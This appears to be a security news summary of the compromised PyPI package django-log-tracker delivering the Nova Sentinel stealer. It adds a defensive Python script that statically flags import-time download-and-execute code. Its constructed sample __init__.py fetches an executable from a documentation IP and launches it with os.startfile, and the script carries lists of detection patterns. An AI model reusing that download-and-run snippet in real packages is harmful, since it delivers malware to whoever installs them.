February 23, 2024 at 12:45PM
A dormant PyPI package, django-log-tracker, was updated after two years of inactivity with a release that delivers the Nova Sentinel information stealer. The update, detected on February 21, 2024, points to a compromise of the maintainer's PyPI account. Rather than bundling the malware, the release downloads an executable from a remote server and launches it. Phylum assessed the incident as an attempted supply-chain attack via a compromised PyPI account.
Key takeaways:
– A dormant package named django-log-tracker on the Python Package Index (PyPI) repository was updated with an information stealer malware called Nova Sentinel.
– The update, detected by the software supply chain security firm Phylum, was flagged as anomalous on February 21, 2024, because the linked GitHub repository had not been updated since April 10, 2022.
– The introduction of the malicious update suggested a compromise of the PyPI account belonging to the developer.
– The rogue version (1.0.4) of the package was downloaded 107 times on the date it was published and has since been removed from PyPI.
– The attacker stripped the package of most of its original content, leaving behind only an __init__.py and an example.py file. The remaining code downloads an executable named “Updater_1.4.4_x64.exe” from a remote server (45.88.180[.]54) and launches it with Python's os.startfile(); that executable carries Nova Sentinel. Because os.startfile() exists only on Windows, only Windows hosts that import the package run the payload.
– Phylum assessed the activity as an attempted supply-chain attack carried out through a compromised PyPI account.
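The behaviour described above (a package whose import-time code fetches a binary from a remote host and hands it to the operating system to run) is cheap to triage statically. The following is an added example, not Phylum's tooling and not the django-log-tracker code: it parses a module with Python's ast module, resolves module-level string constants so a URL stored in a variable is still seen, and reports remote fetches and OS-level launches together with whether they execute on import. The sample __init__.py is constructed for the demonstration and uses a TEST-NET-3 documentation address, not the server named in the advisory.

```python
"""Static triage of a Python module for import-time download-and-execute behaviour.

Added example; not Phylum's tooling and not the trojanised package's code.
"""
from __future__ import annotations

import ast
import ipaddress
from dataclasses import dataclass
from urllib.parse import urlparse

# Callees that fetch remote content, and callees that hand a file to the OS to run.
DOWNLOAD_CALLS = {"urllib.request.urlretrieve", "urllib.request.urlopen", "requests.get"}
EXEC_CALLS = {"os.startfile", "os.system", "subprocess.run", "subprocess.Popen", "subprocess.call"}


@dataclass(frozen=True)
class Finding:
    lineno: int
    kind: str        # "download", "download-from-raw-ip" or "exec"
    detail: str      # the URL, or the callee name for exec findings
    at_import: bool  # True if the call runs as a side effect of importing the module


def _dotted_name(node: ast.AST) -> str | None:
    """Turn the callee of os.startfile(...) into "os.startfile"; None if it is not a dotted name."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def _module_constants(tree: ast.Module) -> dict[str, str]:
    """Collect module-level NAME = "literal" assignments so a URL held in a variable resolves."""
    consts: dict[str, str] = {}
    for stmt in tree.body:
        if (isinstance(stmt, ast.Assign) and len(stmt.targets) == 1
                and isinstance(stmt.targets[0], ast.Name)
                and isinstance(stmt.value, ast.Constant) and isinstance(stmt.value.value, str)):
            consts[stmt.targets[0].id] = stmt.value.value
    return consts


def _string_args(call: ast.Call, consts: dict[str, str]) -> list[str]:
    """Positional arguments that are string literals or names bound to module-level literals."""
    out = []
    for arg in call.args:
        if isinstance(arg, ast.Constant) and isinstance(arg.value, str):
            out.append(arg.value)
        elif isinstance(arg, ast.Name) and arg.id in consts:
            out.append(consts[arg.id])
    return out


def _is_raw_ip_url(url: str) -> bool:
    """True when the URL host is a bare IP address rather than a hostname."""
    host = urlparse(url).hostname
    if host is None:
        return False
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def triage_source(source: str) -> list[Finding]:
    tree = ast.parse(source)
    consts = _module_constants(tree)
    findings: list[Finding] = []
    for stmt in tree.body:
        # Code inside a def/class body only runs when called; everything else runs on import.
        at_import = not isinstance(stmt, (ast.FunctionDef, ast.AsyncFunctionDef, ast.ClassDef))
        for node in ast.walk(stmt):
            if not isinstance(node, ast.Call):
                continue
            name = _dotted_name(node.func)
            if name in DOWNLOAD_CALLS:
                for url in _string_args(node, consts):
                    if url.startswith(("http://", "https://")):
                        kind = "download-from-raw-ip" if _is_raw_ip_url(url) else "download"
                        findings.append(Finding(node.lineno, kind, url, at_import))
            elif name in EXEC_CALLS:
                findings.append(Finding(node.lineno, "exec", name, at_import))
    return findings


def is_download_and_execute(findings: list[Finding]) -> bool:
    """The advisory's pattern: a remote fetch and an OS-level launch, both at import time."""
    kinds = {f.kind for f in findings if f.at_import}
    return bool(kinds & {"download", "download-from-raw-ip"}) and "exec" in kinds


# Constructed stand-in for a trojanised __init__.py (203.0.113.10 is a documentation address).
SAMPLE_INIT = '''\
import os
import urllib.request

URL = "http://203.0.113.10/Updater.exe"
DEST = os.path.join(os.environ.get("TEMP", "."), "Updater.exe")
urllib.request.urlretrieve(URL, DEST)
os.startfile(DEST)
'''

# A benign module that only defines a function produces no findings.
SAMPLE_BENIGN = '''\
import logging

def track(msg):
    logging.getLogger(__name__).info(msg)
'''

if __name__ == "__main__":
    for finding in triage_source(SAMPLE_INIT):
        print(finding)
    print("download-and-execute:", is_download_and_execute(triage_source(SAMPLE_INIT)))
```

Run over a package's __init__.py before adopting a new release; a module that downloads from a bare IP and calls os.startfile() at import time should never pass review. The check is deliberately narrow, so treat a clean result as one signal alongside the release-after-dormancy anomaly, not as a verdict.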
The incident highlights the supply-chain risk carried by package repositories like PyPI: a long-dormant dependency can turn hostile in a single release. It underscores the importance of maintainer account security (strong credentials and two-factor authentication) and of validating dependencies, for example by pinning versions with hashes and treating a sudden release from a project whose repository has been idle for years as a signal to review the package before upgrading.